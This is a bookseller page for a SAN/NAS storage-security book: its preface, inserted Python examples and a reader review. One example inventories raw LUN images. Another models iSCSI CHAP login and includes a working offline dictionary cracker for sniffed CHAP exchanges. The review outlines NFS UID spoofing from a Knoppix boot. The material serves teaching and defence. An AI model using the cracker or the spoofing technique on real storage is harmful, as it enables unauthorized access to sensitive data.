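What the paragraphs above call the "different mounting and reading steps" for block data comes down to this: whoever can read the raw LUN can parse it offline, and the file system's owners, groups, and ACLs are just bytes in the image. As an added example (not from the book), the following Python script takes a raw image of a block-data LUN, walks its MBR partition table, and fingerprints each partition's file system from the real on-disk signatures (the NTFS OEM ID, the FAT type strings, the ext superblock magic and volume label). The image it parses is constructed inside the script; on a real SAN the same bytes would come from reading the mapped device.

```python
"""Inventory a raw block-data LUN image: MBR partitions and their file systems."""
import struct
from dataclasses import dataclass

SECTOR = 512
MBR_SIGNATURE = b"\x55\xaa"
PARTITION_TYPES = {0x07: "NTFS/exFAT", 0x0B: "FAT32", 0x0C: "FAT32 (LBA)",
                   0x83: "Linux", 0x05: "Extended", 0x0F: "Extended (LBA)"}


@dataclass
class Partition:
    index: int
    type_id: int
    lba_start: int
    sectors: int
    bootable: bool


def parse_mbr(image: bytes) -> list[Partition]:
    """Walk the four primary entries of the MBR partition table (offset 446, 16 bytes each)."""
    if len(image) < SECTOR or image[510:512] != MBR_SIGNATURE:
        raise ValueError("no MBR signature: LUN may be GPT, unpartitioned, or not a disk")
    parts = []
    for i in range(4):
        # status(1) CHS start(3) type(1) CHS end(3) LBA start(4 LE) sector count(4 LE)
        status, type_id, lba, count = struct.unpack_from("<B3xB3xII", image, 446 + 16 * i)
        if type_id == 0 or count == 0:
            continue  # empty slot
        parts.append(Partition(i, type_id, lba, count, status == 0x80))
    return parts


def identify_filesystem(image: bytes, part: Partition) -> str:
    """Read the partition's first sectors and match well-known on-disk signatures."""
    start = part.lba_start * SECTOR
    boot = image[start:start + SECTOR]
    if boot[3:11] == b"NTFS    ":
        return "NTFS"
    if boot[82:87] == b"FAT32":
        return "FAT32"
    if boot[54:59] in (b"FAT12", b"FAT16"):
        return boot[54:59].decode()
    # ext2/3/4 keep the superblock 1024 bytes in; magic 0xEF53 sits at superblock offset 56
    sb = image[start + 1024:start + 2048]
    if len(sb) >= 58 and struct.unpack_from("<H", sb, 56)[0] == 0xEF53:
        label = sb[120:136].split(b"\0", 1)[0].decode("ascii", "replace")
        return f"ext2/3/4 (label {label!r})" if label else "ext2/3/4"
    return "unknown"


def inventory(image: bytes) -> list[dict]:
    """Everything an attacker with raw block access learns before touching a single file."""
    return [{"index": p.index, "type": PARTITION_TYPES.get(p.type_id, hex(p.type_id)),
             "lba_start": p.lba_start, "size_mib": p.sectors * SECTOR / 2**20,
             "filesystem": identify_filesystem(image, p)} for p in parse_mbr(image)]


def build_sample_image() -> bytes:
    """Constructed sample LUN (not a real capture): MBR, NTFS at LBA 2048, ext after it."""
    ntfs_start, ext_start, size = 2048, 4096, 2048  # in sectors; 1 MiB per partition
    img = bytearray((ext_start + size) * SECTOR)
    for i, (type_id, lba) in enumerate([(0x07, ntfs_start), (0x83, ext_start)]):
        struct.pack_into("<B3xB3xII", img, 446 + 16 * i, 0x80 if i == 0 else 0, type_id, lba, size)
    img[510:512] = MBR_SIGNATURE
    img[ntfs_start * SECTOR + 3:ntfs_start * SECTOR + 11] = b"NTFS    "
    sb = ext_start * SECTOR + 1024
    struct.pack_into("<H", img, sb + 56, 0xEF53)
    img[sb + 120:sb + 128] = b"patients"  # volume label leaks what the LUN is for
    return bytes(img)


if __name__ == "__main__":
    for entry in inventory(build_sample_image()):
        print(entry)
```

Run as a script it prints one dictionary per partition. The failure mode a practitioner meets most often is handled explicitly: a LUN without the 0x55AA MBR signature (GPT, unpartitioned, or not a disk at all) raises ValueError instead of silently returning an empty table.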

Why Storage Security?

The necessity for storage security is similar to the need for security on any other entity of high value in your organization. For example, the popularity of patching utilities and anti-virus applications is not necessarily due to their ability to provide security protection (even though that is an important benefit), but rather to their ability to improve the uptime and availability of computer systems and networks and the integrity of data. Similarly, the unavailability of a storage network or the loss of data integrity, which would leave an organization in a state of disarray, has a much bigger impact than an infected laptop or an offline application. A good example of this is the Sasser worm released in 2004, which targeted Microsoft operating systems. Although the worm was aimed at Windows, many storage devices that support Windows protocols, such as CIFS and SMB, were also vulnerable, which essentially made the storage device unusable until a full system reboot and patch. The risk of data being unavailable, corrupted, abused, or even deleted will cause tremendous financial harm and storage downtime for many organizations. Furthermore, the regulatory issues that involve storage networks are confusing at best, requiring a resource to guide everyone through the process.

This book's primary attraction is its ability to discuss, demonstrate, and prioritize the storage security issues that every organization faces. Rather than using high-level or abstract language that fails to provide any details, the book provides an abundance of security detail to allow readers to finally understand what the real issues are with storage security and how they can assess the risk for themselves. The book will also provide details to distinguish the high-risk/high-impact issues from low-risk/nominal-impact issues.

A key purpose for the book is to provide a clear understanding of the technology. Storage security is a relatively new industry and can be an overwhelming topic. Several years ago when I began researching storage and security, there were no storage security products, web sites, or whitepapers about storage security. There were only a few people willing to talk to me about the seriousness of storage security. Years later, there is not only an entire industry on securing storage, with large companies like Symantec and Veritas merging together, but with its new popularity, there is a lot more confusion.

The need to secure storage is important on many levels. From a security perspective, many organizations (and their security departments), are not aware of the data protection issues surrounding storage. From the storage perspective, many storage administrators are unaware of the security issues that will affect system uptime and data availability.

Another reason storage security is needed is ease of comprehension. Many sources discuss attack classes in storage, but few actually provide risk exposure descriptions. A key goal of this book is not to force arbitrary risk levels on your organization, but to describe the threat vectors and attack surface in detail and allow readers to deduce their own risk based on the outcomes of these possible attacks. Readers will find that security attacks don't change, but get modified and improved (just like viruses and worms). History has shown that the attack classes that affected networks in the 1990s also affect applications in the 2000s. Similarly, the same attack classes, such as segmentation weaknesses, poor session maintenance, and poor authentication, have also affected storage networks. However, a successful attack on storage equates to data loss or outright compromise.

The completion of this book will provide a very detailed guide of securing storage and understanding attacks.

Regulations and Storage

Regulatory issues facing storage have created significant legal issues for many financial, e-commerce, and medical organizations. New acts and policies such as the Health Insurance Portability and Accountability Act (HIPAA), Sarbanes-Oxley, the Gramm-Leach-Bliley Act (GLBA), SEC Rule 17a-4, DOD (Department of Defense) 5015, and California's SB1386 (Senate Bill 1386) are making a sizable impact on how the storage of data must be protected from unauthorized users, even if those unauthorized users are not hackers but internal employees. Furthermore, as internal audit groups and external IT auditors begin to understand that sensitive data resides in the storage network and devices (as opposed to servers or desktops), the focus will shift away from operating system security to storage networking security.

Government regulations primarily focus on security controls and auditing practices. A key issue for many storage networks, devices, and protocols is their lack of any security controls to protect data at rest or in flight. Additionally, government regulations do not distinguish between controls against outside attackers and controls against malicious internal employees. The fact that data is easier to compromise on a storage filer than on an operating system only adds to the storage security problem.

Regulations have highlighted an overlying issue of data protection. Data, whether it is financial data, non-public private information, or medical data, needs to be protected from unauthorized external and internal entities at all times. Government regulations have only helped raise the concerns that have existed since the first SAN or NAS network.

Best-Practice Benefits

Parts of certain chapters in this book are solely dedicated to best practices. Best practices are important in order to understand standard methods of secure deployment; however, they should not be used as inflexible guidelines. Implementation of security standards and practices will depend on the details and specifics of a storage network.

Best practices can be best described as items that are a prerequisite in order to deploy an acceptable amount of security in any given entity. Some of the sample best practices to secure storage are as follows:

  • High-level architecture (defense in depth)
      • Multi-layer architecture
      • Authentication with authorization
      • Encryption
      • Integrity
      • Auditing
  • Detailed implementation guidelines
      • Node hardening
      • Zoning
      • LUN masking
      • CT/CHAP authentication
      • SSL and IPsec encryption
      • At-rest encryption (AES) with integrity hashing (SHA-1)
      • Management access
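The "CT/CHAP authentication" item above, and the iSCSI scenario earlier in this preface in which an attacker simply connects to the target over IP, are both about the login handshake a target should demand before presenting a LUN. As an added example (not from the book), the following Python models the iSCSI CHAP security negotiation of RFC 3720, which uses RFC 1994 MD5-CHAP: the target issues CHAP_I and CHAP_C, the initiator answers with CHAP_N and CHAP_R and, for mutual CHAP, challenges the target back. It also runs an offline dictionary attack against a captured exchange, which is the reason RFC 3720 requires a random secret of at least 96 bits unless IPsec protects the session. The iqn names and secrets are made up for the example.

```python
"""iSCSI CHAP (RFC 3720, using RFC 1994 MD5-CHAP): the login exchange, mutual
authentication, and an offline dictionary attack on a captured exchange."""
from __future__ import annotations
import hashlib
import hmac
import os


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """CHAP_A=5: CHAP_R = MD5(CHAP_I as one octet || secret || CHAP_C)."""
    if not 0 <= identifier <= 255:
        raise ValueError("CHAP_I is a single octet")
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


def to_hex(b: bytes) -> str:
    """iSCSI text-key encoding of binary values ("0x" hex; the "0b" base64 form is not handled)."""
    return "0x" + b.hex()


def from_hex(s: str) -> bytes:
    if not s.startswith("0x"):
        raise ValueError("only the 0x encoding is handled here")
    return bytes.fromhex(s[2:])


class Target:
    """Storage target: knows each permitted initiator's secret and its own secret for mutual CHAP."""
    def __init__(self, name: str, initiator_secrets: dict[str, bytes], own_secret: bytes):
        self.name, self.initiator_secrets, self.own_secret = name, initiator_secrets, own_secret

    def challenge(self) -> dict[str, str]:
        # Fresh identifier and 16-byte challenge per login; a fixed CHAP_C would allow replay.
        self.identifier, self.nonce = os.urandom(1)[0], os.urandom(16)
        return {"CHAP_A": "5", "CHAP_I": str(self.identifier), "CHAP_C": to_hex(self.nonce)}

    def verify(self, msg: dict[str, str]) -> dict[str, str] | None:
        """Return the reply to send, or None to reject the login."""
        secret = self.initiator_secrets.get(msg.get("CHAP_N", ""))
        if secret is None:
            return None  # unknown initiator: same answer as a bad secret, no hint which
        expected = chap_response(self.identifier, secret, self.nonce)
        if not hmac.compare_digest(expected, from_hex(msg["CHAP_R"])):
            return None
        reply = {}
        if "CHAP_C" in msg:  # initiator demands mutual authentication
            r = chap_response(int(msg["CHAP_I"]), self.own_secret, from_hex(msg["CHAP_C"]))
            reply = {"CHAP_N": self.name, "CHAP_R": to_hex(r)}
        return reply


class Initiator:
    def __init__(self, name: str, secret: bytes, target_secret: bytes | None = None):
        self.name, self.secret, self.target_secret = name, secret, target_secret

    def respond(self, tmsg: dict[str, str]) -> dict[str, str]:
        r = chap_response(int(tmsg["CHAP_I"]), self.secret, from_hex(tmsg["CHAP_C"]))
        msg = {"CHAP_N": self.name, "CHAP_R": to_hex(r)}
        if self.target_secret is not None:  # add our own challenge for mutual CHAP
            self.identifier, self.nonce = os.urandom(1)[0], os.urandom(16)
            msg.update(CHAP_I=str(self.identifier), CHAP_C=to_hex(self.nonce))
        return msg

    def accept_target(self, reply: dict[str, str]) -> bool:
        if self.target_secret is None:
            return True  # one-way CHAP: a rogue target is never detected
        if "CHAP_R" not in reply:
            return False
        expected = chap_response(self.identifier, self.target_secret, self.nonce)
        return hmac.compare_digest(expected, from_hex(reply["CHAP_R"]))


def login(initiator: Initiator, target: Target) -> bool:
    """Run the security-negotiation stage; True only if both sides accept."""
    msg = initiator.respond(target.challenge())
    reply = target.verify(msg)
    return reply is not None and initiator.accept_target(reply)


def crack_chap(identifier: int, challenge: bytes, response: bytes, wordlist) -> bytes | None:
    """Offline attack on a sniffed exchange: one MD5 per guess, no lockout, no rate limit."""
    for candidate in wordlist:
        if chap_response(identifier, candidate, challenge) == response:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed iqn names and secrets for the demonstration.
    target = Target("iqn.2005-01.com.example:san01",
                    {"iqn.2005-01.com.example:db01": b"Kq8v2PzL0rTn4wX9sBy1"},
                    own_secret=b"tG7hJ2mN5pQ8rS1uV4wX")
    db01 = Initiator("iqn.2005-01.com.example:db01", b"Kq8v2PzL0rTn4wX9sBy1",
                     target_secret=b"tG7hJ2mN5pQ8rS1uV4wX")
    print("mutual CHAP login:", login(db01, target))
    print("intruder with no secret:", login(Initiator("iqn.2005-01.com.example:evil", b"?"), target))
```

login() returns False for an unknown initiator, a wrong initiator secret, or a target that cannot prove it knows the mutual secret, and the target's reply gives no hint which check failed. crack_chap() shows the other side of the same arithmetic: a sniffed CHAP_I, CHAP_C, and CHAP_R cost one MD5 per guess, so a dictionary-word secret falls immediately, which is why the secret must be random and long or the session must be under IPsec.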

Who Should Read This Book

This book targets individuals who are responsible for IT infrastructure. Examples of these individuals are IT managers, storage administrators, network designers, architects, and engineers who want to evaluate security in storage architectures. It will also serve the needs of security consultants, engineers, architects, managers, auditors, trainers, and technical marketing managers who want to update their backgrounds in storage security.

The book is targeted toward readers who want to learn the common "how-tos" of securing storage. Readers requiring an essential reference guide can use the book as their primary resource. Generally speaking, this book is targeted for three types of individuals:

  • Individuals who are interested in establishing or expanding their knowledge of securing storage
  • Individuals who are interested in learning how to assess and audit their own storage networks
  • Individuals who are looking for best practices or new strategies for storage security

The book's audience will range from novice readers who are looking for the basics behind storage architectures, networking, and LANs, to moderately skilled administrators looking to gain information on Fibre Channel communication, iSCSI, and Internet Protocol.

Readers will benefit from the book in several different ways. First, readers will be able to remove the confusion from securing storage. Readers will be able to qualify the risk of their storage network with a clear description of the security issues in storage. Readers will also learn the security principles for designing, testing, and evaluating storage networks. Several chapters have hands-on self-assessment steps for critical security threats and vulnerabilities. Additionally, best practices security measures are discussed in the context of data availability, integrity, and compliance requirements. Finally, readers will understand the security concerns for storage and be able to determine the impact of each issue.

This book will provide readers with the data center's guide to analyzing, testing, and implementing SAN and NAS security. This book will cover common "how-tos," provide the all-essential "reference steps," and provide recommendations for storage security best practices.

The book is not necessarily meant to be read from start to finish, but can instead serve as a quick reference, where individual chapters are self-supporting without knowledge of prior chapters. For example, a reader who needs to understand how to secure a Brocade Fibre Channel switch can turn directly to Chapter 4, "SANs: Zone and Switch Security." The book can provide insight for the following types of individuals:

  • Individuals interested in a practical method to secure SAN and NAS networks
  • Individuals interested in assessing the security of their existing SAN and NAS networks
  • Individuals interested in testing the security of their existing SAN and NAS networks
  • Individuals interested in expanding their security knowledge on emerging storage technologies, such as encryption, authentication, and management
  • Individuals interested in understanding how governmental regulations and compliance requirements affect storage

How This Book Is Organized

This book is organized into five parts consisting of fourteen chapters that include details on SAN security, NAS security, iSCSI security, storage defenses, policies, trends, and case studies.

The first three parts discuss core issues with SAN and NAS security, attacks against SAN and NAS devices, and SAN and NAS security solutions. These chapters target some of the most important topics in securing storage, as well as testing procedures for each attack class.

Chapter 1 begins with an overview of storage security, covering its basic premise, the problems encountered, typical uses, and future trends. Additionally, an overview of security and storage standards is discussed.

Chapters 2 through 4 discuss SAN security risks, including weaknesses of Fibre Channel (FC) and adjoining devices, such as switches and host-bus adapters (HBAs). Additionally, these chapters discuss SAN attacks, self-assessment steps (which allow readers to perform checks against their storage architecture), and mitigating solutions.

Chapters 5 through 7 are similar to Chapters 2 through 4, but focus on NAS architectures instead of SANs. Chapter 5 discusses the risks associated with NAS storage devices using IP protocols such as NFS and CIFS.

Chapters 6 and 7 discuss CIFS and NFS security issues, attacks, self-assessment steps, and mitigating solutions for storage architectures.

Chapter 8 discusses iSCSI security, including an overview of iSCSI communication, risks associated with iSCSI storage devices, and a discussion of the iSCSI attacks.

Part Four of the book focuses on storage defenses. Chapter 9 discusses securing Fibre Channel SANs, Chapter 10 discusses the security of NFS/CIFS NAS, and Chapter 11 discusses the methods to secure iSCSI SANs. These chapters concentrate on configuring existing storage devices so that they protect themselves. Part Five of the book shifts focus from SAN and NAS security risks and attacks to larger storage security issues, such as emerging security technologies, regulations, and case studies. These three chapters discuss security from the compliance perspective, covering both governmental requirements and best practices. Chapter 12 discusses some of the major governmental policies that affect storage architectures. Chapter 13 discusses how to audit your storage network against government compliance requirements and security best practices. Finally, Chapter 14 is a discussion of real-world case studies in storage environments. Examples describe SAN and NAS architectures with the optimal balance of security and functionality.

How This Book Is Written

The book is written to address the topic of securing storage from a technology perspective. It does not discuss the paper policies and procedures that should be in place, nor does it describe the human processes of security as they pertain to storage. It also does not discuss storage security at a high level, but specifically discusses how storage systems, networks, and protocols are affected by security. The key difference this book offers is that it does not generically say storage has security problems and gloss over the details, but starts with the details first.

The book discusses the security weaknesses, threats, exploits, and attacks of storage systems, networks, and technologies in Chapters 2 through 8. After that discussion is complete, the book discusses the mitigating solutions for each attack identified, in Chapters 9 through 14. The attacks are discussed in depth because it is very difficult to discuss solutions without any context of the problem. Although some vendors will not appreciate the fact that this book exposes problems, it is not written to embarrass any vendor or to prevent end users from adopting storage devices, but instead to show organizations why certain security mitigations and solutions need to be in place when deploying a storage network. For example, after a virus infects a user's machine, it is easier to discuss why anti-virus software and host hardening procedures are very important. The same idea applies to storage. Organizations will understand why taking active steps to secure storage is important after reviewing the attacks on Fibre Channel, iSCSI, CIFS, and NFS.

The book makes an attempt to classify the risk of each identified problem; however, the discussion is limited because risk is best measured when applied to specific scenarios rather than generic examples. Many attacks shown in this book can be classified as low risk, but they are still discussed to expose the reader to the security problem. Conversely, many attacks shown in the book are high risk and are shown in their full extent and detail.

The book is not vendor specific, but rather protocol specific (Fibre Channel and iSCSI for SANs and NFS and CIFS for IP NAS).

The book holds storage systems, networks, and protocols to the same standard of security as operating systems, wireless networks, and applications. Storage security strengths are discussed to show the reader the positive security aspects of storage; however, the book also shows failed or poor security attempts in storage systems, networks, and protocols. The book does not give storage devices and networks any "breaks" because storage networking is an emerging technology. Any system or network that controls a large portion of an organization's data must be held to the same high security standard expected from operating system vendors or even application product vendors.

Finally, the book is written in the context of full disclosure. The goal is to allow each reader to receive enough information to read, perform, and analyze each security problem and each discussion about the mitigating solution. This model should allow the reader to make risk acceptability decisions based on their own storage environment.

© Copyright Pearson Education. All rights reserved.


Customer Reviews

Be the first to write a review
( 0 )
Rating Distribution

5 Star

(0)

4 Star

(0)

3 Star

(0)

2 Star

(0)

1 Star

(0)

Your Rating:

Your Name: Create a Pen Name or

Barnes & Noble.com Review Rules

Showing 1 Customer Reviews
  • Anonymous

    Posted December 18, 2005

    an unsettling book to some sysadmins

    The theme of this book is that Storage Area Networks and Network Attached Storage have been hitherto neglected with respect to securing their contents against unauthorised use. Dwivedi remarks that most sysadmins focus on maintaining and securing a corporate firewall, along with regularly patching users' machines plus web servers. A common attitude is that SAN and NAS devices are at the very heart of the corporate network, and often cannot be directly accessed from outside the firewall. Dwivedi spends the bulk of his book debunking this idea. For one thing, he points out that a SAN or NAS box is a computer that has to run an operating system, usually linux, unix or Microsoft. A vendor is very unlikely to write a custom operating system from scratch; it is too expensive and takes too long to devise. So if nothing else, you as a sysadmin should regularly patch those boxes if you can, when known bugs are found in their operating systems. These boxes should be no more exempt from patching than your other machines, even those behind the firewall. Another cause of concern is the sheer mass of data on a SAN or NAS box, nowadays likely to be many gigabytes. These are high value targets for an attacker, whereas a typical user's desktop would have much smaller data sets. Plus, even with a firewall, there is always the possibility of an employee being an attacker. If she has a machine inside the firewall, then this already gives her a good start. Of course, you might reply that you 'lock down' your users' machines, so that they cannot get root access, for example. But the attacker with a Microsoft machine could boot off a Knoppix CD, for example, and go into a linux that sits only in memory, and for which she has root. Suppose now you have a NAS box exporting a file system via NFS to the attacker's machine, which is normally running Microsoft Windows. The author shows how the attacker can, from her Knoppix OS, mount the NAS file system and, by changing her local passwd file, assume any user id and group id that gives her read access (and maybe write access) to any file in the foreign file system. These are the sort of attacks that you have to guard against. The book offers several chapters at its end describing possible countermeasures. The tone of the book is not alarmist. Rather, Dwivedi matter-of-factly walks through many attacks, the above being just one case. He shows how, using open source code freely available on the net, an attacker could glean useful data from your machines.
